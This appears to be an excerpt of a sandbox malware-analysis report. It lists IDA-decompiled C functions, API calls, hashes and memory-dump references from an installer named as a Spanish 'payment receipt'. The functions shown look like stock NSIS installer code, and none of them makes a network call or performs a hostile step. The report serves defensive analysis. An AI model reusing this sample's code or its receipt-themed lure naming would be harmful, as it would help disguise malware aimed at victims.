                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Close$Enum
                                        • String ID:
                                        • API String ID: 464197530-0
                                        • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                        • Instruction ID: 13ce92619e22af03a8d5f803c99d3fa2c3d1cb872fac5522cbaad6f830247a1d
                                        • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                        • Instruction Fuzzy Hash: 94116A32540509FBEF129F90CE09BEE7B69EF58350F110036B905B60E0E7B5DE21AB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00402E5D(intOrPtr _a4) {
                                        				long _t2;
                                        				struct HWND__* _t3;
                                        				struct HWND__* _t6;
                                        
                                        				if(_a4 == 0) {
                                        					__eflags =  *0x7976d8; // 0x0
                                        					if(__eflags == 0) {
                                        						_t2 = GetTickCount();
                                        						__eflags = _t2 -  *0x7a8a30;
                                        						if(_t2 >  *0x7a8a30) {
                                        							_t3 = CreateDialogParamW( *0x7a8a20, 0x6f, 0, E00402DD7, 0);
                                        							 *0x7976d8 = _t3;
                                        							return ShowWindow(_t3, 5);
                                        						}
                                        						return _t2;
                                        					} else {
                                        						return E00406675(0);
                                        					}
                                        				} else {
                                        					_t6 =  *0x7976d8; // 0x0
                                        					if(_t6 != 0) {
                                        						_t6 = DestroyWindow(_t6);
                                        					}
                                        					 *0x7976d8 = 0;
                                        					return _t6;
                                        				}
                                        			}






                                        0x00402e64
                                        0x00402e7e
                                        0x00402e84
                                        0x00402e8e
                                        0x00402e94
                                        0x00402e9a
                                        0x00402eab
                                        0x00402eb4
                                        0x00000000
                                        0x00402eb9
                                        0x00402ec0
                                        0x00402e86
                                        0x00402e8d
                                        0x00402e8d
                                        0x00402e66
                                        0x00402e66
                                        0x00402e6d
                                        0x00402e70
                                        0x00402e70
                                        0x00402e76
                                        0x00402e7d
                                        0x00402e7d

                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,0040303D,?,?,00000006,00000008,0000000A), ref: 00402E70
                                        • GetTickCount.KERNEL32 ref: 00402E8E
                                        • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                        • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
                                        • Instruction ID: 7afe0c5cdde3553510745d2e994aff72f2021582eecc7c7a9da0eee8c5fdd21f
                                        • Opcode Fuzzy Hash: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
                                        • Instruction Fuzzy Hash: B3F05E30966A21EBC6616B24FE8C99B7B64AB44B41B15887BF041B11B8DA784891CBDC
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 53%
                                        			E00405C38(void* __eflags, intOrPtr _a4) {
                                        				int _t11;
                                        				signed char* _t12;
                                        				intOrPtr _t18;
                                        				intOrPtr* _t21;
                                        				signed int _t23;
                                        
                                        				E0040625F(0x7a4728, _a4);
                                        				_t21 = E00405BDB(0x7a4728);
                                        				if(_t21 != 0) {
                                        					E004064F3(_t21);
                                        					if(( *0x7a8a3c & 0x00000080) == 0) {
                                        						L5:
                                        						_t23 = _t21 - 0x7a4728 >> 1;
                                        						while(1) {
                                        							_t11 = lstrlenW(0x7a4728);
                                        							_push(0x7a4728);
                                        							if(_t11 <= _t23) {
                                        								break;
                                        							}
                                        							_t12 = E004065A2();
                                        							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                        								E00405B7C(0x7a4728);
                                        								continue;
                                        							} else {
                                        								goto L1;
                                        							}
                                        						}
                                        						E00405B30();
                                        						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                        					}
                                        					_t18 =  *_t21;
                                        					if(_t18 == 0 || _t18 == 0x5c) {
                                        						goto L1;
                                        					} else {
                                        						goto L5;
                                        					}
                                        				}
                                        				L1:
                                        				return 0;
                                        			}








                                        0x00405c44
                                        0x00405c4f
                                        0x00405c53
                                        0x00405c5a
                                        0x00405c66
                                        0x00405c76
                                        0x00405c78
                                        0x00405c90
                                        0x00405c91
                                        0x00405c98
                                        0x00405c99
                                        0x00000000
                                        0x00000000
                                        0x00405c7c
                                        0x00405c83
                                        0x00405c8b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00405c83
                                        0x00405c9b
                                        0x00000000
                                        0x00405caf
                                        0x00405c68
                                        0x00405c6e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00405c6e
                                        0x00405c55
                                        0x00000000

                                        APIs
                                          • Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,Blass Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C
                                          • Part of subcall function 00405BDB: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,?,00405C4F,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,?,?,76583420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76583420,00000000), ref: 00405BE9
                                          • Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405BEE
                                          • Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405C06
                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,?,?,76583420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76583420,00000000), ref: 00405C91
                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,?,?,76583420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76583420), ref: 00405CA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsz62F8.tmp
                                        • API String ID: 3248276644-725846307
                                        • Opcode ID: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
                                        • Instruction ID: 07588a96ba491492048338639ced47dd8f75e02a3aa2c86f807570fea5ede87b
                                        • Opcode Fuzzy Hash: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
                                        • Instruction Fuzzy Hash: 3FF0D125008F1115E72233361D49EAF2664CE96360B1A023FF952B12D1DB3C99939C6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 89%
                                        			E00405237(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                        				int _t15;
                                        				long _t16;
                                        
                                        				_t15 = _a8;
                                        				if(_t15 != 0x102) {
                                        					if(_t15 != 0x200) {
                                        						_t16 = _a16;
                                        						L7:
                                        						if(_t15 == 0x419 &&  *0x7a1f0c != _t16) {
                                        							_push(_t16);
                                        							_push(6);
                                        							 *0x7a1f0c = _t16;
                                        							E00404C0D();
                                        						}
                                        						L11:
                                        						return CallWindowProcW( *0x7a1f14, _a4, _t15, _a12, _t16);
                                        					}
                                        					if(IsWindowVisible(_a4) == 0) {
                                        						L10:
                                        						_t16 = _a16;
                                        						goto L11;
                                        					}
                                        					_t16 = E00404B8D(_a4, "true");
                                        					_t15 = 0x419;
                                        					goto L7;
                                        				}
                                        				if(_a12 != 0x20) {
                                        					goto L10;
                                        				}
                                        				E00404240(0x413);
                                        				return 0;
                                        			}





                                        0x0040523b
                                        0x00405245
                                        0x00405261
                                        0x00405283
                                        0x00405286
                                        0x0040528c
                                        0x00405296
                                        0x00405297
                                        0x00405299
                                        0x0040529f
                                        0x0040529f
                                        0x004052a9
                                        0x00000000
                                        0x004052b7
                                        0x0040526e
                                        0x004052a6
                                        0x004052a6
                                        0x00000000
                                        0x004052a6
                                        0x0040527a
                                        0x0040527c
                                        0x00000000
                                        0x0040527c
                                        0x0040524b
                                        0x00000000
                                        0x00000000
                                        0x00405252
                                        0x00000000

                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00405266
                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004052B7
                                          • Part of subcall function 00404240: SendMessageW.USER32(00010384,00000000,00000000,00000000), ref: 00404252
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: 03dbe0d26460962354df2622affe4a7f19e46f8d18e7fde011b494353cd470c5
                                        • Instruction ID: 5e04443d83733b215e2c60cf409d87083b19ce8acf9f2344b17a5e906d0b9b78
                                        • Opcode Fuzzy Hash: 03dbe0d26460962354df2622affe4a7f19e46f8d18e7fde011b494353cd470c5
                                        • Instruction Fuzzy Hash: E7017C31500608AFEF209F52DD81AAB3725EF95755F10407FFA00B61D0D73E9C919E69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004038D8() {
                                        				void* _t2;
                                        				void* _t3;
                                        				void* _t6;
                                        				void* _t8;
                                        
                                        				_t8 =  *0x79fee4; // 0x8a2668
                                        				_t3 = E004038BD(_t2, 0);
                                        				if(_t8 != 0) {
                                        					do {
                                        						_t6 = _t8;
                                        						_t8 =  *_t8;
                                        						_t1 = _t6 + 8; // 0x10000000
                                        						FreeLibrary( *_t1);
                                        						_t3 = GlobalFree(_t6);
                                        					} while (_t8 != 0);
                                        				}
                                        				 *0x79fee4 =  *0x79fee4 & 0x00000000;
                                        				return _t3;
                                        			}







                                        0x004038d9
                                        0x004038e1
                                        0x004038e8
                                        0x004038eb
                                        0x004038eb
                                        0x004038ed
                                        0x004038ef
                                        0x004038f2
                                        0x004038f9
                                        0x004038ff
                                        0x00403903
                                        0x00403904
                                        0x0040390c

                                        APIs
                                        • FreeLibrary.KERNEL32(10000000,C:\Users\user\AppData\Local\Temp\,00000000,76583420,004038B0,004036C6,00000006,?,00000006,00000008,0000000A), ref: 004038F2
                                        • GlobalFree.KERNEL32(008A2668), ref: 004038F9
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004038EA
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-3355392842
                                        • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                        • Instruction ID: 0fbf8731d8bad765cb9f744f6f02bb9fbed9ce401ee6a58d62f233990fc3ff23
                                        • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                        • Instruction Fuzzy Hash: 31E01D334011205BC6115F55FD0475A77685F44B36F15407BF9847717147B45C535BD8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E00405B7C(WCHAR* _a4) {
                                        				WCHAR* _t5;
                                        				WCHAR* _t7;
                                        
                                        				_t7 = _a4;
                                        				_t5 =  &(_t7[lstrlenW(_t7)]);
                                        				while( *_t5 != 0x5c) {
                                        					_push(_t5);
                                        					_push(_t7);
                                        					_t5 = CharPrevW();
                                        					if(_t5 > _t7) {
                                        						continue;
                                        					}
                                        					break;
                                        				}
                                        				 *_t5 =  *_t5 & 0x00000000;
                                        				return  &(_t5[1]);
                                        			}





                                        0x00405b7d
                                        0x00405b87
                                        0x00405b8a
                                        0x00405b90
                                        0x00405b91
                                        0x00405b92
                                        0x00405b9a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00405b9a
                                        0x00405b9c
                                        0x00405ba4

                                        APIs
                                        • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe,C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B82
                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe,C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-3370423016
                                        • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                        • Instruction ID: 52ec536bf7c92ef41efc45dde312f484f3c591b0d09bb1e57af7322ca826a5e1
                                        • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                        • Instruction Fuzzy Hash: 85D05EB24009209AD3126704DC00DAF77B8EF11310746446AE840A6166D7787C818AAC
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                        				void* _v0;
                                        				void* _t17;
                                        				signed int _t19;
                                        				void* _t20;
                                        				void* _t24;
                                        				void* _t26;
                                        				void* _t30;
                                        				void* _t36;
                                        				void* _t38;
                                        				void* _t39;
                                        				signed int _t41;
                                        				void* _t42;
                                        				void* _t51;
                                        				void* _t52;
                                        				signed short* _t54;
                                        				void* _t56;
                                        				void* _t59;
                                        				void* _t61;
                                        
                                        				 *0x1000406c = _a8;
                                        				 *0x10004070 = _a16;
                                        				 *0x10004074 = _a12;
                                        				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
                                        				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
                                        				_t17 = E10001243();
                                        				_v0 = _t17;
                                        				_t52 = _t17;
                                        				if( *_t17 == 0) {
                                        					L16:
                                        					return GlobalFree(_t17);
                                        				} else {
                                        					do {
                                        						_t19 =  *_t52 & 0x0000ffff;
                                        						_t42 = 2;
                                        						_t54 = _t52 + _t42;
                                        						_t61 = _t19 - 0x6c;
                                        						if(_t61 > 0) {
                                        							_t20 = _t19 - 0x70;
                                        							if(_t20 == 0) {
                                        								L12:
                                        								_t52 = _t54 + _t42;
                                        								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
                                        								L13:
                                        								GlobalFree(_t24);
                                        								goto L14;
                                        							}
                                        							_t26 = _t20 - _t42;
                                        							if(_t26 == 0) {
                                        								L10:
                                        								_t52 =  &(_t54[1]);
                                        								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
                                        								goto L13;
                                        							}
                                        							L7:
                                        							if(_t26 == 1) {
                                        								_t30 = GlobalAlloc(0x40, _t41 + 4);
                                        								 *_t30 =  *0x10004040;
                                        								 *0x10004040 = _t30;
                                        								E10001563(_t30 + 4,  *0x10004074, _t41);
                                        								_t59 = _t59 + 0xc;
                                        							}
                                        							goto L14;
                                        						}
                                        						if(_t61 == 0) {
                                        							L17:
                                        							_t33 =  *0x10004040;
                                        							if( *0x10004040 != 0) {
                                        								E10001563( *0x10004074, _t33 + 4, _t41);
                                        								_t59 = _t59 + 0xc;
                                        								_t36 =  *0x10004040;
                                        								GlobalFree(_t36);
                                        								 *0x10004040 =  *_t36;
                                        							}
                                        							goto L14;
                                        						}
                                        						_t38 = _t19 - 0x4c;
                                        						if(_t38 == 0) {
                                        							goto L17;
                                        						}
                                        						_t39 = _t38 - 4;
                                        						if(_t39 == 0) {
                                        							 *_t54 =  *_t54 + 0xa;
                                        							goto L12;
                                        						}
                                        						_t26 = _t39 - _t42;
                                        						if(_t26 == 0) {
                                        							 *_t54 =  *_t54 + 0xa;
                                        							goto L10;
                                        						}
                                        						goto L7;
                                        						L14:
                                        					} while ( *_t52 != 0);
                                        					_t17 = _v0;
                                        					goto L16;
                                        				}
                                        			}





















                                        0x100010e6
                                        0x100010f0
                                        0x100010ff
                                        0x1000110e
                                        0x10001119
                                        0x1000111c
                                        0x1000112b
                                        0x1000112f
                                        0x10001131
                                        0x100011d8
                                        0x100011de
                                        0x10001137
                                        0x10001138
                                        0x10001138
                                        0x1000113d
                                        0x1000113e
                                        0x10001140
                                        0x10001143
                                        0x1000120d
                                        0x10001210
                                        0x100011b0
                                        0x100011b6
                                        0x100011bf
                                        0x100011c4
                                        0x100011c7
                                        0x00000000
                                        0x100011c7
                                        0x10001212
                                        0x10001214
                                        0x10001196
                                        0x1000119d
                                        0x100011a5
                                        0x00000000
                                        0x100011a5
                                        0x10001161
                                        0x10001162
                                        0x1000116a
                                        0x10001177
                                        0x1000117f
                                        0x10001188
                                        0x1000118d
                                        0x1000118d
                                        0x00000000
                                        0x10001162
                                        0x10001149
                                        0x100011df
                                        0x100011df
                                        0x100011e6
                                        0x100011f3
                                        0x100011f8
                                        0x100011fb
                                        0x10001203
                                        0x10001205
                                        0x10001205
                                        0x00000000
                                        0x100011e6
                                        0x1000114f
                                        0x10001152
                                        0x00000000
                                        0x00000000
                                        0x10001158
                                        0x1000115b
                                        0x100011ac
                                        0x00000000
                                        0x100011ac
                                        0x1000115d
                                        0x1000115f
                                        0x10001192
                                        0x00000000
                                        0x10001192
                                        0x00000000
                                        0x100011c9
                                        0x100011c9
                                        0x100011d3
                                        0x00000000
                                        0x100011d7

